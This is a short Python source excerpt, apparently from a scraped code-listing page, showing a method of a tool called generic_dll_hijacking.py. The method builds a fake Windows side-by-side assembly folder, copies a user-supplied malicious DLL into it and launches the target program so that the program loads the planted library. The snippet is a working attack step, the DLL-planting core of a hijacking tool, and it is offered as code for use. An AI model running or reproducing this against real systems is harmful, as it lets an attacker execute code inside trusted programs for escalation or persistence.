generic_dll_hijacking.py 文件源码

def handle_dll_local(self, subpath, binary, clean):
        path = subpath + "\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.15063.0_none_583b8639f462029f\\"
        try:
            print "[+] Creating: " + path
            subprocess.check_call(
                ["powershell", "-C", "mkdir", path, ">", "$null"])
            print "[+] Copying the malicious dll to the path"
            subprocess.check_call(
                ["powershell", "-C", "cp", self.args["malicious_dll"], path])
            prev_pids = psutil.pids()
            print "[*] Executing the binary"
            subprocess.check_call(["powershell", "-C", binary])
        except subprocess.CalledProcessError as error:
            self.print_ko(str(error) + "\n")